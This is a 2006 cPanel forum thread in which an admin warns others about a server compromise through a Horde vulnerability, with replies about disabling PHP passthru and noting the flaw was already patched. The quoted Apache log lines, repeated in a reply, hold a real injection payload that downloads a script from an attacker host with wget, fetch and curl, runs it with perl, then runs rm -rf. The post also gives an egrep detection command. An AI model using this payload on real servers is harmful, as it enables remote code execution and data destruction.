Please whitelist cPanel in your adblocker so that you’re able to see our version release promotions, thanks!

The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Security Update: HORDER Exploit

Discussion in 'Security' started by stugster, Sep 8, 2006.

  1. stugster

    stugster Well-Known Member

    Joined:
    Apr 16, 2002
    Messages:
    75
    Likes Received:
    0
    Trophy Points:
    306
    Location:
    Edinburgh, UK
    cPanel Access Level:
    Root Administrator
    Hey guys, just letting you know that our server was compromised and completely messed up last night by a Horde exploit.

    Here's an output from our technician:

    The hacker got into the server using an apache exploit:
    ------------------------------------------------------------------------------------------------
    egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /usr/local/apache/logs/*

    [28/Apr/2006:06:27:52 -0500] " GET /horde-cvs/horde/services/help/?show=about& module=; %22.passthru(%22killall%20-9%20perl; cd%20%22.chr(47).%22tmp; wget%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; fetch%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; curl%20-O%20h%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; perl%20h; rm%20-rf%20*%22); '. HTTP/1.1" 302 310
    /usr/local/apache/logs/access_log:200.32.97.251 - - [28/Apr/2006:06:27:52 -0500] " GET /pub/horde-cvs/horde/services/help/?show=about& module=; %22.passthru(%22killall%20-9%20perl; cd%20%22.chr(47).%22tmp; wget%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; fetch%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; curl%20-O%20h%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; perl%20h; rm%20-rf%20*%22); '. HTTP/1.1" 302 310
    /usr/local/apache/logs/access_log:200.32.97.251 - - [28/Apr/2006:06:27:56 -0500] " GET /horde/services/help/?show=about& module=; %22.passthru(%22killall%20-9%20perl; cd%20%22.chr(47).%22tmp; wget%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; fetch%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; curl%20-O%20h%20http:%22.chr(47).%22%22.chr(47).%22elsotanodg.com%22.chr(47).%22h; perl%20h; rm%20-rf%20*%22); '. HTTP/1.1" 404 -

    -------------------------------------------------------------------------------------------------

    We're going to have to migrate to another box - rather than just messing about with the files.

    Just a heads up for you's!
     
    #1 stugster, Sep 8, 2006
  2. netlook

    netlook Well-Known Member
    PartnerNOC

    Joined:
    Mar 25, 2004
    Messages:
    335
    Likes Received:
    0
    Trophy Points:
    166
    I think passthru() and other "dangerous" functions in PHP should be disabled by default on all webhosting boxes!
     
    #2 netlook, Sep 8, 2006
  3. randomuser

    randomuser Well-Known Member

    Joined:
    Jun 25, 2005
    Messages:
    147
    Likes Received:
    0
    Trophy Points:
    166
    Was it a Horde vulnerability or an Apache vulnerability? You state both. Your logs show Horde. Which would mean that Horde is accessible on your server remotely without first authenticating for webmail.


    [28/Apr/2006:06:27:52 -0500] " GET /horde-cvs/horde/services/help/?show=about& module=; %22.passthru(%22killall%20-9%20perl; cd%20%22.chr(47).%22tmp; wget%20http:%22.chr(47).%22%22.chr(47).%22elsotano dg.com%22.chr(47).%22h; fetch%20http:%22.chr(47).%22%22.chr(47).%22elsotan odg.com%22.chr(47).%22h; curl%20-O%20h%20http:%22.chr(47).%22%22.chr(47).%22elsotan odg.com%22.chr(47).%22h; perl%20h; rm%20-rf%20*%22); '. HTTP/1.1" 302 310
    /usr/local/apache/logs/access_log:200.32.97.251 - -

    [28/Apr/2006:06:27:52 -0500] " GET /pub/horde-cvs/horde/services/help/?show=about& module=; %22.passthru(%22killall%20-9%20perl; cd%20%22.chr(47).%22tmp; wget%20http:%22.chr(47).%22%22.chr(47).%22elsotano dg.com%22.chr(47).%22h; fetch%20http:%22.chr(47).%22%22.chr(47).%22elsotan odg.com%22.chr(47).%22h; curl%20-O%20h%20http:%22.chr(47).%22%22.chr(47).%22elsotan odg.com%22.chr(47).%22h; perl%20h; rm%20-rf%20*%22); '. HTTP/1.1" 302 310
    /usr/local/apache/logs/access_log:200.32.97.251 - -


    The 3rd log was a 404. The first 2 logs, shown above, are from April. The Horde exploit in the logs is old now, having been out for a few months and already patched.
     
    #3 randomuser, Sep 8, 2006
(You must log in or sign up to post here.)
Loading...
Similar Threads - Security Update HORDER
  1. NestMan

    Security Advisor says there are EasyApache updates?

    NestMan, Jun 24, 2016, in forum: EasyApache
    Replies:
    11
    Views:
    787
    Infopro
    Aug 16, 2016
  2. kshivachev

    Editing ModSecurity vendor rules

    kshivachev, Sep 4, 2017, in forum: Security
    Replies:
    5
    Views:
    104
    cPanelMichael
    Sep 6, 2017
  3. jandafields

    SOLVED Configure Security Policies is broken in 66.0.18

    jandafields, Sep 1, 2017, in forum: General Discussion
    Replies:
    3
    Views:
    135
    cPanelMichael
    Sep 5, 2017
  4. filip212

    ModSecurity Inbound Anomaly Score Exceeded

    filip212, Aug 29, 2017, in forum: Security
    Replies:
    3
    Views:
    152
    fuzzylogic
    Aug 30, 2017
  5. electric

    Let customers view and whitelist mod_security rules?

    electric, Aug 26, 2017, in forum: Security
    Replies:
    2
    Views:
    111
    cPanelMichael
    Aug 28, 2017

Share This Page